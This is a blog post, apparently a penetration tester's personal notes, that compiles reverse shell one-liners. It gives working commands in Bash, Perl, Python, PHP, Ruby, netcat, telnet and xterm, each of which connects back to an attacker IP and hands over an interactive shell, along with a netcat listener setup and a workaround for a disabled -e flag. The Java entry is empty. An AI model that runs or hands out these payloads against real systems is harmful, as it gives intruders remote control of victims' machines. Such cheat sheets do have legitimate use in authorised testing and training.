There are many pages on the web documenting quick reverse shell one liners. Pentestmonkey and Bernardo Damele have both created a good few posts between them but I wanted to recapture what they’ve got for my notes purposes. (It’s easier for me to find stuff if it’s in one place). All credit goes to both of those guys where I got all this info from.
Step one – Set up your listener.
1 | nc -l -v attackerip 4444 |
In all these examples the attacker IP will be 192.168.0.100
Bash
1 2 | exec 5<>/dev/tcp/192.168.0.100/4444 cat <&5 | while read line; do $line 2>&5 >&5; done |
1 | 0<&196;exec 196<>/dev/tcp/192.168.0.100/4444; sh <&196 >&196 2>&196 |
1 | bash -i >& /dev/tcp/192.168.0.100/4444 0>&1 |
Perl
1 | perl -e 'use socket;$i="192.168.0.100";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' |
1 | perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.100:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' |
For windows based systems you can use
1 | perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"192.168.0.100:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' |
Python
1 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.100",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' |
PHP
1 | php -r '$sock=fsockopen("192.168.0.100",4444);exec("/bin/sh -i <&3 >&3 2>&3");' |
Ruby
1 | ruby -rsocket -e'f=TCPSocket.open("192.168.0.100",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f) |
The following does not need /bin/sh:
1 | ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.0.100","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' |
The following is for windows based systems:
1 | ruby -rsocket -e 'c=TCPSocket.new("192.168.0.100","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' |
NetCat
1 | nc -e /bin/sh 192.168.0.100 4444 |
1 | nc -c /bin/sh 192.168.0.100 4444 |
1 | /bin/sh | nc 192.168.0.100 4444 |
If the -e flag is disabled you can get around it using the following
1 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f |
1 | rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p |
Java
1 2 3 |
Telnet
If netcat is missing (and in most cases you wont have this), then use telnet:
1 | rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.0.100 4444 0/tmp/p |
1 2 | telnet 192.168.0.100 4444 | /bin/bash | telnet 192.168.0.100 4445 # also listen on your machine also on port 4445/tcp |
Xterm
This one is a little more tricky, you need to start a listener on the attacker box to catch the incoming xterm
1 | Xnest :1; xterm -display 127.0.0.1:1 |
and then inside the spawned xterm session run this:
1 | xhost +victimip |
Then on the victim you need to run this
1 | xterm -display 192.168.0.100:1 |
Leave a Reply
You must be logged in to post a comment.